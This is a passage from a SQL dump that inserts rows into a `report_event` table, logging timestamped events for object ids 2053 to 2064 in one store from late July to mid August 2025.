(18861, '2025-07-28 11:10:34', 1, 2063, 0, 1, 1),
(18862, '2025-07-28 11:51:53', 1, 2060, 0, 1, 1),
(18863, '2025-07-28 12:10:09', 1, 2063, 0, 1, 1),
(18864, '2025-07-28 12:20:25', 1, 2055, 0, 1, 1),
(18865, '2025-07-28 13:08:44', 1, 2063, 0, 1, 1),
(18866, '2025-07-28 13:54:55', 1, 2055, 0, 1, 1),
(18867, '2025-07-28 14:10:06', 1, 2061, 0, 1, 1),
(18868, '2025-07-28 14:44:54', 1, 2062, 0, 1, 1),
(18869, '2025-07-28 15:07:53', 1, 2064, 0, 1, 1),
(18870, '2025-07-28 15:40:28', 1, 2061, 0, 1, 1),
(18871, '2025-07-28 22:03:38', 1, 2054, 0, 1, 1),
(18872, '2025-07-28 23:01:36', 1, 2059, 0, 1, 1),
(18873, '2025-07-28 23:17:11', 1, 2064, 0, 1, 1),
(18874, '2025-07-29 02:43:25', 1, 2064, 0, 1, 1),
(18875, '2025-07-29 04:56:24', 1, 2064, 0, 1, 1);
INSERT INTO `report_event` (`event_id`, `logged_at`, `event_type_id`, `object_id`, `subject_id`, `subtype`, `store_id`) VALUES
(18876, '2025-07-29 06:44:30', 1, 2059, 0, 1, 1),
(18877, '2025-07-29 06:44:33', 1, 2060, 0, 1, 1),
(18878, '2025-07-29 08:31:01', 1, 2058, 0, 1, 1),
(18879, '2025-07-29 08:43:10', 1, 2062, 0, 1, 1),
(18880, '2025-07-29 09:10:14', 1, 2061, 0, 1, 1),
(18881, '2025-07-29 10:07:12', 1, 2063, 0, 1, 1),
(18882, '2025-07-29 14:41:29', 1, 2060, 0, 1, 1),
(18883, '2025-07-29 14:56:42', 1, 2062, 0, 1, 1),
(18884, '2025-07-29 15:04:09', 1, 2063, 0, 1, 1),
(18885, '2025-07-29 16:34:23', 1, 2061, 0, 1, 1),
(18886, '2025-07-29 19:57:35', 1, 2054, 0, 1, 1),
(18887, '2025-07-29 19:57:38', 1, 2058, 0, 1, 1),
(18888, '2025-07-29 20:46:32', 1, 2058, 0, 1, 1),
(18889, '2025-07-29 22:45:17', 1, 2059, 0, 1, 1),
(18890, '2025-07-30 01:05:03', 1, 2063, 0, 1, 1),
(18891, '2025-07-30 02:29:32', 1, 2060, 0, 1, 1),
(18892, '2025-07-30 02:53:51', 1, 2063, 0, 1, 1),
(18893, '2025-07-30 05:16:00', 1, 2054, 0, 1, 1),
(18894, '2025-07-30 06:22:11', 1, 2055, 0, 1, 1),
(18895, '2025-07-30 08:53:25', 1, 2064, 0, 1, 1),
(18896, '2025-07-30 09:09:36', 1, 2059, 0, 1, 1),
(18897, '2025-07-30 09:13:32', 1, 2058, 0, 1, 1),
(18898, '2025-07-30 10:24:55', 1, 2064, 0, 1, 1),
(18899, '2025-07-30 10:35:38', 1, 2061, 0, 1, 1),
(18900, '2025-07-30 10:51:58', 1, 2054, 0, 1, 1),
(18901, '2025-07-30 11:49:04', 1, 2053, 0, 1, 1),
(18902, '2025-07-30 13:53:45', 1, 2060, 0, 1, 1),
(18903, '2025-07-30 14:14:59', 1, 2053, 0, 1, 1),
(18904, '2025-07-30 14:29:22', 1, 2060, 0, 1, 1),
(18905, '2025-07-30 14:33:09', 1, 2063, 0, 1, 1),
(18906, '2025-07-30 16:14:31', 1, 2053, 0, 1, 1),
(18907, '2025-07-30 16:43:10', 1, 2062, 0, 1, 1),
(18908, '2025-07-30 18:40:13', 1, 2060, 0, 1, 1),
(18909, '2025-07-30 18:59:30', 1, 2064, 0, 1, 1),
(18910, '2025-07-30 20:15:14', 1, 2064, 0, 1, 1),
(18911, '2025-07-30 23:33:57', 1, 2058, 0, 1, 1),
(18912, '2025-07-31 01:56:18', 1, 2060, 0, 1, 1),
(18913, '2025-07-31 02:13:50', 1, 2061, 0, 1, 1),
(18914, '2025-07-31 05:40:22', 1, 2060, 0, 1, 1),
(18915, '2025-07-31 05:57:35', 1, 2055, 0, 1, 1),
(18916, '2025-07-31 06:03:01', 1, 2054, 0, 1, 1),
(18917, '2025-07-31 06:12:56', 1, 2064, 0, 1, 1),
(18918, '2025-07-31 07:38:44', 1, 2061, 0, 1, 1),
(18919, '2025-07-31 09:26:49', 1, 2059, 0, 1, 1),
(18920, '2025-07-31 14:08:36', 1, 2058, 0, 1, 1),
(18921, '2025-07-31 14:36:56', 1, 2062, 0, 1, 1),
(18922, '2025-07-31 16:00:47', 1, 2064, 0, 1, 1),
(18923, '2025-07-31 17:54:12', 1, 2064, 0, 1, 1),
(18924, '2025-07-31 17:59:17', 1, 2059, 0, 1, 1),
(18925, '2025-07-31 19:15:22', 1, 2060, 0, 1, 1),
(18926, '2025-07-31 20:54:16', 1, 2061, 0, 1, 1),
(18927, '2025-07-31 21:01:50', 1, 2064, 0, 1, 1),
(18928, '2025-07-31 21:03:41', 1, 2064, 0, 1, 1),
(18929, '2025-07-31 21:07:22', 1, 2058, 0, 1, 1),
(18930, '2025-07-31 23:30:50', 1, 2053, 0, 1, 1),
(18931, '2025-08-01 00:07:10', 1, 2060, 0, 1, 1),
(18932, '2025-08-01 00:18:28', 1, 2053, 0, 1, 1),
(18933, '2025-08-01 00:24:09', 1, 2062, 0, 1, 1),
(18934, '2025-08-01 00:42:15', 1, 2064, 0, 1, 1),
(18935, '2025-08-01 02:04:05', 1, 2053, 0, 1, 1),
(18936, '2025-08-01 03:13:19', 1, 2061, 0, 1, 1),
(18937, '2025-08-01 05:25:37', 1, 2060, 0, 1, 1),
(18938, '2025-08-01 09:37:24', 1, 2060, 0, 1, 1),
(18939, '2025-08-01 09:46:45', 1, 2062, 0, 1, 1),
(18940, '2025-08-01 10:12:40', 1, 2063, 0, 1, 1),
(18941, '2025-08-01 14:29:49', 1, 2062, 0, 1, 1),
(18942, '2025-08-01 21:35:23', 1, 2061, 0, 1, 1),
(18943, '2025-08-01 21:44:15', 1, 2058, 0, 1, 1),
(18944, '2025-08-01 21:58:00', 1, 2055, 0, 1, 1),
(18945, '2025-08-01 22:07:06', 1, 2054, 0, 1, 1),
(18946, '2025-08-01 23:23:31', 1, 2060, 0, 1, 1),
(18947, '2025-08-01 23:31:42', 1, 2063, 0, 1, 1),
(18948, '2025-08-01 23:49:17', 1, 2062, 0, 1, 1),
(18949, '2025-08-01 23:54:03', 1, 2058, 0, 1, 1),
(18950, '2025-08-02 00:38:48', 1, 2055, 0, 1, 1),
(18951, '2025-08-02 01:05:52', 1, 2055, 0, 1, 1),
(18952, '2025-08-02 01:38:56', 1, 2060, 0, 1, 1),
(18953, '2025-08-02 01:45:49', 1, 2063, 0, 1, 1),
(18954, '2025-08-02 02:04:00', 1, 2058, 0, 1, 1),
(18955, '2025-08-02 02:41:56', 1, 2060, 0, 1, 1),
(18956, '2025-08-02 02:48:40', 1, 2063, 0, 1, 1),
(18957, '2025-08-02 03:11:20', 1, 2060, 0, 1, 1),
(18958, '2025-08-02 03:17:52', 1, 2063, 0, 1, 1),
(18959, '2025-08-02 03:35:51', 1, 2058, 0, 1, 1),
(18960, '2025-08-02 03:54:35', 1, 2064, 0, 1, 1),
(18961, '2025-08-02 04:05:33', 1, 2059, 0, 1, 1),
(18962, '2025-08-02 04:13:51', 1, 2062, 0, 1, 1),
(18963, '2025-08-02 04:15:40', 1, 2055, 0, 1, 1),
(18964, '2025-08-02 04:24:35', 1, 2060, 0, 1, 1),
(18965, '2025-08-02 04:35:46', 1, 2064, 0, 1, 1),
(18966, '2025-08-02 04:46:34', 1, 2063, 0, 1, 1),
(18967, '2025-08-02 05:22:57', 1, 2061, 0, 1, 1),
(18968, '2025-08-02 05:23:18', 1, 2060, 0, 1, 1),
(18969, '2025-08-02 05:43:04', 1, 2063, 0, 1, 1),
(18970, '2025-08-02 05:58:05', 1, 2062, 0, 1, 1),
(18971, '2025-08-02 07:11:12', 1, 2054, 0, 1, 1),
(18972, '2025-08-02 07:27:34', 1, 2059, 0, 1, 1),
(18973, '2025-08-02 07:40:13', 1, 2064, 0, 1, 1),
(18974, '2025-08-02 08:04:01', 1, 2060, 0, 1, 1),
(18975, '2025-08-02 08:06:05', 1, 2060, 0, 1, 1),
(18976, '2025-08-02 08:13:34', 1, 2063, 0, 1, 1),
(18977, '2025-08-02 08:33:51', 1, 2058, 0, 1, 1),
(18978, '2025-08-02 09:01:56', 1, 2064, 0, 1, 1),
(18979, '2025-08-02 09:15:00', 1, 2055, 0, 1, 1),
(18980, '2025-08-02 09:45:05', 1, 2060, 0, 1, 1),
(18981, '2025-08-02 09:52:55', 1, 2063, 0, 1, 1),
(18982, '2025-08-02 10:14:19', 1, 2058, 0, 1, 1),
(18983, '2025-08-02 10:57:28', 1, 2055, 0, 1, 1),
(18984, '2025-08-02 11:31:11', 1, 2064, 0, 1, 1),
(18985, '2025-08-02 12:10:23', 1, 2061, 0, 1, 1),
(18986, '2025-08-02 12:48:16', 1, 2062, 0, 1, 1),
(18987, '2025-08-02 14:09:12', 1, 2054, 0, 1, 1),
(18988, '2025-08-02 14:18:58', 1, 2062, 0, 1, 1),
(18989, '2025-08-02 14:26:46', 1, 2059, 0, 1, 1),
(18990, '2025-08-02 14:40:56', 1, 2064, 0, 1, 1),
(18991, '2025-08-02 15:00:27', 1, 2061, 0, 1, 1),
(18992, '2025-08-02 16:47:09', 1, 2064, 0, 1, 1),
(18993, '2025-08-02 17:00:40', 1, 2061, 0, 1, 1),
(18994, '2025-08-02 18:46:31', 1, 2060, 0, 1, 1),
(18995, '2025-08-02 18:53:17', 1, 2063, 0, 1, 1),
(18996, '2025-08-02 19:19:24', 1, 2060, 0, 1, 1),
(18997, '2025-08-02 19:39:31', 1, 2060, 0, 1, 1),
(18998, '2025-08-02 19:54:31', 1, 2063, 0, 1, 1),
(18999, '2025-08-02 20:34:31', 1, 2058, 0, 1, 1),
(19000, '2025-08-02 21:13:24', 1, 2059, 0, 1, 1),
(19001, '2025-08-02 21:56:00', 1, 2055, 0, 1, 1),
(19002, '2025-08-02 22:07:03', 1, 2064, 0, 1, 1),
(19003, '2025-08-02 23:40:47', 1, 2061, 0, 1, 1),
(19004, '2025-08-02 23:40:50', 1, 2063, 0, 1, 1),
(19005, '2025-08-02 23:40:54', 1, 2062, 0, 1, 1),
(19006, '2025-08-03 00:10:18', 1, 2061, 0, 1, 1),
(19007, '2025-08-03 01:20:35', 1, 2062, 0, 1, 1),
(19008, '2025-08-03 02:49:41', 1, 2060, 0, 1, 1),
(19009, '2025-08-03 02:57:29', 1, 2063, 0, 1, 1),
(19010, '2025-08-03 03:30:33', 1, 2060, 0, 1, 1),
(19011, '2025-08-03 03:38:43', 1, 2063, 0, 1, 1),
(19012, '2025-08-03 04:00:49', 1, 2058, 0, 1, 1),
(19013, '2025-08-03 04:46:17', 1, 2055, 0, 1, 1),
(19014, '2025-08-03 05:43:00', 1, 2064, 0, 1, 1),
(19015, '2025-08-03 06:03:10', 1, 2061, 0, 1, 1),
(19016, '2025-08-03 06:43:46', 1, 2062, 0, 1, 1),
(19017, '2025-08-03 08:10:11', 1, 2054, 0, 1, 1),
(19018, '2025-08-03 08:29:11', 1, 2059, 0, 1, 1),
(19019, '2025-08-03 08:44:08', 1, 2064, 0, 1, 1),
(19020, '2025-08-03 12:03:23', 1, 2064, 0, 1, 1),
(19021, '2025-08-03 13:41:46', 1, 2055, 0, 1, 1),
(19022, '2025-08-03 14:27:38', 1, 2062, 0, 1, 1),
(19023, '2025-08-03 17:18:46', 1, 2058, 0, 1, 1),
(19024, '2025-08-03 18:15:19', 1, 2060, 0, 1, 1),
(19025, '2025-08-03 19:08:27', 1, 2060, 0, 1, 1),
(19026, '2025-08-03 19:41:27', 1, 2059, 0, 1, 1),
(19027, '2025-08-03 20:44:52', 1, 2058, 0, 1, 1),
(19028, '2025-08-03 20:58:02', 1, 2064, 0, 1, 1),
(19029, '2025-08-03 21:26:01', 1, 2061, 0, 1, 1),
(19030, '2025-08-03 23:42:22', 1, 2061, 0, 1, 1),
(19031, '2025-08-04 05:22:12', 1, 2064, 0, 1, 1),
(19032, '2025-08-04 05:54:35', 1, 2060, 0, 1, 1),
(19033, '2025-08-04 07:01:47', 1, 2059, 0, 1, 1),
(19034, '2025-08-04 07:01:54', 1, 2060, 0, 1, 1),
(19035, '2025-08-04 07:06:34', 1, 2063, 0, 1, 1),
(19036, '2025-08-04 07:16:13', 1, 2060, 0, 1, 1),
(19037, '2025-08-04 09:16:21', 1, 2064, 0, 1, 1),
(19038, '2025-08-04 09:16:37', 1, 2062, 0, 1, 1),
(19039, '2025-08-04 09:16:53', 1, 2063, 0, 1, 1),
(19040, '2025-08-04 09:16:58', 1, 2061, 0, 1, 1),
(19041, '2025-08-04 09:17:08', 1, 2059, 0, 1, 1),
(19042, '2025-08-04 09:17:15', 1, 2058, 0, 1, 1),
(19043, '2025-08-04 09:17:21', 1, 2055, 0, 1, 1),
(19044, '2025-08-04 09:17:26', 1, 2054, 0, 1, 1),
(19045, '2025-08-04 09:17:32', 1, 2060, 0, 1, 1),
(19046, '2025-08-04 09:36:52', 1, 2061, 0, 1, 1),
(19047, '2025-08-04 11:13:17', 1, 2053, 0, 1, 1),
(19048, '2025-08-04 12:05:31', 1, 2055, 0, 1, 1),
(19049, '2025-08-04 14:23:08', 1, 2053, 0, 1, 1),
(19050, '2025-08-04 15:59:46', 1, 2062, 0, 1, 1),
(19051, '2025-08-04 19:25:28', 1, 2060, 0, 1, 1),
(19052, '2025-08-04 19:53:50', 1, 2060, 0, 1, 1),
(19053, '2025-08-04 21:57:06', 1, 2054, 0, 1, 1),
(19054, '2025-08-04 22:07:03', 1, 2054, 0, 1, 1),
(19055, '2025-08-04 22:17:15', 1, 2059, 0, 1, 1),
(19056, '2025-08-04 22:52:30', 1, 2058, 0, 1, 1),
(19057, '2025-08-04 23:14:57', 1, 2061, 0, 1, 1),
(19058, '2025-08-05 03:02:58', 1, 2064, 0, 1, 1),
(19059, '2025-08-05 05:20:58', 1, 2053, 0, 1, 1),
(19060, '2025-08-05 06:37:36', 1, 2053, 0, 1, 1),
(19061, '2025-08-05 07:02:03', 1, 2054, 0, 1, 1),
(19062, '2025-08-05 07:02:05', 1, 2055, 0, 1, 1),
(19063, '2025-08-05 07:02:11', 1, 2064, 0, 1, 1),
(19064, '2025-08-05 07:02:13', 1, 2063, 0, 1, 1),
(19065, '2025-08-05 07:02:15', 1, 2062, 0, 1, 1),
(19066, '2025-08-05 07:02:17', 1, 2060, 0, 1, 1),
(19067, '2025-08-05 07:02:19', 1, 2059, 0, 1, 1),
(19068, '2025-08-05 07:02:21', 1, 2061, 0, 1, 1),
(19069, '2025-08-05 07:02:23', 1, 2058, 0, 1, 1),
(19070, '2025-08-05 08:32:41', 1, 2058, 0, 1, 1),
(19071, '2025-08-05 09:11:43', 1, 2063, 0, 1, 1),
(19072, '2025-08-05 09:18:51', 1, 2062, 0, 1, 1),
(19073, '2025-08-05 09:24:29', 1, 2060, 0, 1, 1),
(19074, '2025-08-05 09:26:15', 1, 2058, 0, 1, 1),
(19075, '2025-08-05 10:45:45', 1, 2061, 0, 1, 1),
(19076, '2025-08-05 12:08:03', 1, 2060, 0, 1, 1),
(19077, '2025-08-05 12:22:47', 1, 2062, 0, 1, 1),
(19078, '2025-08-05 14:33:07', 1, 2062, 0, 1, 1),
(19079, '2025-08-05 18:16:02', 1, 2060, 0, 1, 1),
(19080, '2025-08-05 20:23:30', 1, 2058, 0, 1, 1),
(19081, '2025-08-05 20:23:34', 1, 2054, 0, 1, 1),
(19082, '2025-08-05 23:56:35', 1, 2059, 0, 1, 1),
(19083, '2025-08-06 00:33:52', 1, 2062, 0, 1, 1),
(19084, '2025-08-06 00:38:27', 1, 2053, 0, 1, 1),
(19085, '2025-08-06 03:27:33', 1, 2061, 0, 1, 1),
(19086, '2025-08-06 03:30:12', 1, 2061, 0, 1, 1),
(19087, '2025-08-06 08:46:09', 1, 2058, 0, 1, 1),
(19088, '2025-08-06 13:05:03', 1, 2062, 0, 1, 1),
(19089, '2025-08-06 13:05:59', 1, 2053, 0, 1, 1),
(19090, '2025-08-06 13:08:28', 1, 2062, 0, 1, 1),
(19091, '2025-08-06 13:09:44', 1, 2061, 0, 1, 1),
(19092, '2025-08-06 13:10:19', 1, 2061, 0, 1, 1),
(19093, '2025-08-06 13:24:07', 1, 2063, 0, 1, 1),
(19094, '2025-08-06 13:24:52', 1, 2063, 0, 1, 1),
(19095, '2025-08-06 13:45:51', 1, 2060, 0, 1, 1),
(19096, '2025-08-06 13:48:40', 1, 2059, 0, 1, 1),
(19097, '2025-08-06 13:51:15', 1, 2059, 0, 1, 1),
(19098, '2025-08-06 14:21:19', 1, 2062, 0, 1, 1),
(19099, '2025-08-06 14:28:05', 1, 2053, 0, 1, 1),
(19100, '2025-08-06 15:11:25', 1, 2054, 0, 1, 1),
(19101, '2025-08-06 16:11:21', 1, 2064, 0, 1, 1),
(19102, '2025-08-06 16:32:33', 1, 2060, 0, 1, 1),
(19103, '2025-08-06 16:50:28', 1, 2061, 0, 1, 1),
(19104, '2025-08-06 16:59:28', 1, 2058, 0, 1, 1),
(19105, '2025-08-06 17:10:30', 1, 2055, 0, 1, 1),
(19106, '2025-08-06 17:18:33', 1, 2054, 0, 1, 1),
(19107, '2025-08-06 18:41:08', 1, 2060, 0, 1, 1),
(19108, '2025-08-06 19:26:51', 1, 2053, 0, 1, 1),
(19109, '2025-08-06 23:32:23', 1, 2060, 0, 1, 1),
(19110, '2025-08-06 23:49:10', 1, 2064, 0, 1, 1),
(19111, '2025-08-07 00:33:46', 1, 2064, 0, 1, 1),
(19112, '2025-08-07 00:44:09', 1, 2054, 0, 1, 1),
(19113, '2025-08-07 00:44:30', 1, 2063, 0, 1, 1),
(19114, '2025-08-07 01:17:42', 1, 2060, 0, 1, 1),
(19115, '2025-08-07 01:32:01', 1, 2062, 0, 1, 1),
(19116, '2025-08-07 01:43:25', 1, 2063, 0, 1, 1),
(19117, '2025-08-07 02:09:02', 1, 2061, 0, 1, 1),
(19118, '2025-08-07 02:13:10', 1, 2064, 0, 1, 1),
(19119, '2025-08-07 03:36:29', 1, 2055, 0, 1, 1),
(19120, '2025-08-07 03:44:23', 1, 2060, 0, 1, 1),
(19121, '2025-08-07 03:50:53', 1, 2064, 0, 1, 1),
(19122, '2025-08-07 05:27:47', 1, 2061, 0, 1, 1),
(19123, '2025-08-07 06:42:39', 1, 2059, 0, 1, 1),
(19124, '2025-08-07 07:08:26', 1, 2059, 0, 1, 1),
(19125, '2025-08-07 07:59:50', 1, 2053, 0, 1, 1),
(19126, '2025-08-07 14:18:43', 1, 2053, 0, 1, 1),
(19127, '2025-08-07 15:07:38', 1, 2062, 0, 1, 1),
(19128, '2025-08-07 19:02:05', 1, 2059, 0, 1, 1),
(19129, '2025-08-07 20:48:56', 1, 2053, 0, 1, 1),
(19130, '2025-08-07 20:56:56', 1, 2062, 0, 1, 1),
(19131, '2025-08-07 21:37:18', 1, 2061, 0, 1, 1),
(19132, '2025-08-08 01:37:54', 1, 2060, 0, 1, 1),
(19133, '2025-08-08 01:58:32', 1, 2053, 0, 1, 1),
(19134, '2025-08-08 05:26:41', 1, 2053, 0, 1, 1),
(19135, '2025-08-08 09:31:58', 1, 2063, 0, 1, 1),
(19136, '2025-08-08 14:53:50', 1, 2062, 0, 1, 1),
(19137, '2025-08-08 20:55:13', 1, 2060, 0, 1, 1),
(19138, '2025-08-08 20:55:19', 1, 2058, 0, 1, 1),
(19139, '2025-08-08 20:55:44', 1, 2061, 0, 1, 1),
(19140, '2025-08-08 20:55:47', 1, 2063, 0, 1, 1),
(19141, '2025-08-08 20:56:10', 1, 2059, 0, 1, 1),
(19142, '2025-08-08 20:56:19', 1, 2064, 0, 1, 1),
(19143, '2025-08-08 20:56:21', 1, 2062, 0, 1, 1),
(19144, '2025-08-08 20:56:22', 1, 2054, 0, 1, 1),
(19145, '2025-08-08 20:57:58', 1, 2055, 0, 1, 1),
(19146, '2025-08-08 20:58:34', 1, 2053, 0, 1, 1),
(19147, '2025-08-08 21:56:58', 1, 2061, 0, 1, 1),
(19148, '2025-08-08 23:50:44', 1, 2058, 0, 1, 1),
(19149, '2025-08-09 01:31:31', 1, 2060, 0, 1, 1),
(19150, '2025-08-09 01:52:49', 1, 2062, 0, 1, 1),
(19151, '2025-08-09 01:52:57', 1, 2063, 0, 1, 1),
(19152, '2025-08-09 01:53:01', 1, 2061, 0, 1, 1),
(19153, '2025-08-09 03:08:35', 1, 2064, 0, 1, 1),
(19154, '2025-08-09 04:36:18', 1, 2062, 0, 1, 1),
(19155, '2025-08-09 05:30:23', 1, 2053, 0, 1, 1),
(19156, '2025-08-09 09:07:27', 1, 2064, 0, 1, 1),
(19157, '2025-08-09 09:43:38', 1, 2060, 0, 1, 1),
(19158, '2025-08-09 10:13:33', 1, 2061, 0, 1, 1),
(19159, '2025-08-09 10:57:05', 1, 2053, 0, 1, 1),
(19160, '2025-08-09 12:07:39', 1, 2061, 0, 1, 1),
(19161, '2025-08-09 12:33:08', 1, 2053, 0, 1, 1),
(19162, '2025-08-09 14:30:06', 1, 2062, 0, 1, 1),
(19163, '2025-08-09 16:36:38', 1, 2064, 0, 1, 1),
(19164, '2025-08-09 16:49:10', 1, 2053, 0, 1, 1),
(19165, '2025-08-09 17:14:21', 1, 2061, 0, 1, 1),
(19166, '2025-08-09 21:50:33', 1, 2055, 0, 1, 1),
(19167, '2025-08-09 21:50:36', 1, 2058, 0, 1, 1),
(19168, '2025-08-09 23:07:24', 1, 2059, 0, 1, 1),
(19169, '2025-08-09 23:09:16', 1, 2054, 0, 1, 1),
(19170, '2025-08-10 04:45:12', 1, 2059, 0, 1, 1),
(19171, '2025-08-10 07:43:00', 1, 2061, 0, 1, 1),
(19172, '2025-08-10 07:47:37', 1, 2060, 0, 1, 1),
(19173, '2025-08-10 08:59:16', 1, 2060, 0, 1, 1),
(19174, '2025-08-10 08:59:26', 1, 2063, 0, 1, 1),
(19175, '2025-08-10 14:19:52', 1, 2062, 0, 1, 1),
(19176, '2025-08-10 15:53:35', 1, 2053, 0, 1, 1),
(19177, '2025-08-10 16:34:39', 1, 2061, 0, 1, 1),
(19178, '2025-08-10 21:57:23', 1, 2059, 0, 1, 1),
(19179, '2025-08-10 22:49:40', 1, 2062, 0, 1, 1),
(19180, '2025-08-11 00:28:19', 1, 2060, 0, 1, 1),
(19181, '2025-08-11 00:48:25', 1, 2061, 0, 1, 1),
(19182, '2025-08-11 01:20:08', 1, 2053, 0, 1, 1),
(19183, '2025-08-11 01:41:56', 1, 2059, 0, 1, 1),
(19184, '2025-08-11 04:48:30', 1, 2064, 0, 1, 1),
(19185, '2025-08-11 05:59:34', 1, 2055, 0, 1, 1),
(19186, '2025-08-11 06:46:26', 1, 2059, 0, 1, 1),
(19187, '2025-08-11 06:46:29', 1, 2060, 0, 1, 1),
(19188, '2025-08-11 10:36:45', 1, 2059, 0, 1, 1),
(19189, '2025-08-11 12:12:58', 1, 2055, 0, 1, 1),
(19190, '2025-08-11 13:52:30', 1, 2061, 0, 1, 1),
(19191, '2025-08-11 14:55:25', 1, 2062, 0, 1, 1),
(19192, '2025-08-11 15:22:52', 1, 2054, 0, 1, 1),
(19193, '2025-08-11 16:29:47', 1, 2054, 0, 1, 1),
(19194, '2025-08-11 18:32:42', 1, 2059, 0, 1, 1),
(19195, '2025-08-11 21:46:39', 1, 2054, 0, 1, 1),
(19196, '2025-08-11 22:09:19', 1, 2061, 0, 1, 1),
(19197, '2025-08-11 22:21:03', 1, 2058, 0, 1, 1),
(19198, '2025-08-11 22:32:47', 1, 2055, 0, 1, 1),
(19199, '2025-08-11 22:41:21', 1, 2054, 0, 1, 1),
(19200, '2025-08-11 22:53:25', 1, 2064, 0, 1, 1),
(19201, '2025-08-11 23:02:40', 1, 2059, 0, 1, 1),
(19202, '2025-08-11 23:12:45', 1, 2061, 0, 1, 1),
(19203, '2025-08-11 23:50:08', 1, 2060, 0, 1, 1),
(19204, '2025-08-12 01:18:36', 1, 2061, 0, 1, 1),
(19205, '2025-08-12 03:16:47', 1, 2064, 0, 1, 1),
(19206, '2025-08-12 03:31:45', 1, 2055, 0, 1, 1),
(19207, '2025-08-12 03:38:36', 1, 2054, 0, 1, 1),
(19208, '2025-08-12 05:38:55', 1, 2064, 0, 1, 1),
(19209, '2025-08-12 05:51:30', 1, 2064, 0, 1, 1),
(19210, '2025-08-12 06:02:30', 1, 2063, 0, 1, 1),
(19211, '2025-08-12 06:21:40', 1, 2062, 0, 1, 1),
(19212, '2025-08-12 07:28:52', 1, 2060, 0, 1, 1),
(19213, '2025-08-12 08:35:25', 1, 2060, 0, 1, 1),
(19214, '2025-08-12 08:36:58', 1, 2053, 0, 1, 1),
(19215, '2025-08-12 08:40:05', 1, 2058, 0, 1, 1),
(19216, '2025-08-12 09:01:26', 1, 2058, 0, 1, 1),
(19217, '2025-08-12 13:06:31', 1, 2054, 0, 1, 1),
(19218, '2025-08-12 13:27:43', 1, 2061, 0, 1, 1),
(19219, '2025-08-12 14:19:52', 1, 2062, 0, 1, 1),
(19220, '2025-08-12 15:07:13', 1, 2053, 0, 1, 1),
(19221, '2025-08-12 15:14:12', 1, 2061, 0, 1, 1),
(19222, '2025-08-12 19:03:34', 1, 2060, 0, 1, 1),
(19223, '2025-08-12 19:44:01', 1, 2058, 0, 1, 1),
(19224, '2025-08-12 19:44:09', 1, 2054, 0, 1, 1),
(19225, '2025-08-12 21:20:55', 1, 2053, 0, 1, 1),
(19226, '2025-08-13 02:57:37', 1, 2059, 0, 1, 1),
(19227, '2025-08-13 05:54:44', 1, 2060, 0, 1, 1),
(19228, '2025-08-13 06:08:14', 1, 2062, 0, 1, 1),
(19229, '2025-08-13 13:46:19', 1, 2060, 0, 1, 1),
(19230, '2025-08-13 14:28:49', 1, 2062, 0, 1, 1),
(19231, '2025-08-13 17:55:49', 1, 2060, 0, 1, 1),
(19232, '2025-08-13 18:26:12', 1, 2060, 0, 1, 1),
(19233, '2025-08-13 21:37:53', 1, 2061, 0, 1, 1),
(19234, '2025-08-14 00:54:08', 1, 2061, 0, 1, 1),
(19235, '2025-08-14 01:50:41', 1, 2053, 0, 1, 1),
(19236, '2025-08-14 04:51:17', 1, 2053, 0, 1, 1),
(19237, '2025-08-14 06:26:29', 1, 2064, 0, 1, 1),
(19238, '2025-08-14 09:10:03', 1, 2053, 0, 1, 1),
(19239, '2025-08-14 10:52:38', 1, 2064, 0, 1, 1),
(19240, '2025-08-14 10:57:09', 1, 2063, 0, 1, 1),
(19241, '2025-08-14 10:57:14', 1, 2061, 0, 1, 1),
(19242, '2025-08-14 10:57:23', 1, 2059, 0, 1, 1),
(19243, '2025-08-14 10:57:28', 1, 2058, 0, 1, 1),
(19244, '2025-08-14 10:57:39', 1, 2055, 0, 1, 1),
(19245, '2025-08-14 10:57:51', 1, 2054, 0, 1, 1),
(19246, '2025-08-14 10:58:11', 1, 2060, 0, 1, 1),
(19247, '2025-08-14 11:40:30', 1, 2064, 0, 1, 1),
(19248, '2025-08-14 11:40:45', 1, 2062, 0, 1, 1),
(19249, '2025-08-14 11:41:02', 1, 2063, 0, 1, 1),
(19250, '2025-08-14 11:41:08', 1, 2061, 0, 1, 1),
(19251, '2025-08-14 11:41:13', 1, 2059, 0, 1, 1),
(19252, '2025-08-14 11:41:18', 1, 2058, 0, 1, 1),
(19253, '2025-08-14 11:41:22', 1, 2055, 0, 1, 1),
(19254, '2025-08-14 11:41:57', 1, 2054, 0, 1, 1),
(19255, '2025-08-14 11:42:16', 1, 2060, 0, 1, 1),
(19256, '2025-08-14 12:02:33', 1, 2053, 0, 1, 1),
(19257, '2025-08-14 12:37:05', 1, 2064, 0, 1, 1),
(19258, '2025-08-14 12:38:44', 1, 2062, 0, 1, 1),
(19259, '2025-08-14 12:39:12', 1, 2063, 0, 1, 1),
(19260, '2025-08-14 12:40:16', 1, 2061, 0, 1, 1),
(19261, '2025-08-14 12:40:35', 1, 2059, 0, 1, 1),
(19262, '2025-08-14 12:40:55', 1, 2058, 0, 1, 1),
(19263, '2025-08-14 12:41:02', 1, 2055, 0, 1, 1),
(19264, '2025-08-14 12:41:11', 1, 2054, 0, 1, 1),
(19265, '2025-08-14 12:41:18', 1, 2060, 0, 1, 1),
(19266, '2025-08-14 13:09:46', 1, 2061, 0, 1, 1),
(19267, '2025-08-14 13:11:10', 1, 2063, 0, 1, 1),
(19268, '2025-08-14 13:12:32', 1, 2064, 0, 1, 1),
(19269, '2025-08-14 13:35:46', 1, 2062, 0, 1, 1),
(19270, '2025-08-14 13:36:31', 1, 2064, 0, 1, 1),
(19271, '2025-08-14 13:37:05', 1, 2062, 0, 1, 1),
(19272, '2025-08-14 13:39:51', 1, 2058, 0, 1, 1),
(19273, '2025-08-14 13:40:53', 1, 2055, 0, 1, 1),
(19274, '2025-08-14 13:41:23', 1, 2058, 0, 1, 1),
(19275, '2025-08-14 14:37:01', 1, 2063, 0, 1, 1),
(19276, '2025-08-14 14:38:56', 1, 2064, 0, 1, 1),
(19277, '2025-08-14 14:58:17', 1, 2054, 0, 1, 1),
(19278, '2025-08-14 14:59:27', 1, 2062, 0, 1, 1),
(19279, '2025-08-14 15:04:51', 1, 2060, 0, 1, 1),
(19280, '2025-08-14 15:31:33', 1, 2059, 0, 1, 1),
(19281, '2025-08-14 15:32:57', 1, 2059, 0, 1, 1),
(19282, '2025-08-14 15:48:42', 1, 2064, 0, 1, 1),
(19283, '2025-08-14 15:49:38', 1, 2060, 0, 1, 1),
(19284, '2025-08-14 16:03:31', 1, 2061, 0, 1, 1),
(19285, '2025-08-14 16:04:44', 1, 2061, 0, 1, 1),
(19286, '2025-08-14 16:28:15', 1, 2064, 0, 1, 1),
